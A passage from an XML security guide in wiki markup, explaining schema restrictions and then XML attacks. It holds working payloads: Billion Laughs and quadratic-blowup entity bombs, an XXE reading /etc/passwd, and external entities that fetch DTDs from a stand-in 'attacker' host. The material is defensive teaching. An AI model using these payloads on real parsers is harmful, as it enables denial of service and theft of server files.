    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy .&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt; &lt;br /&gt;
 &amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
   &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
 &amp;lt;/SOAP:ENVELOPE&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
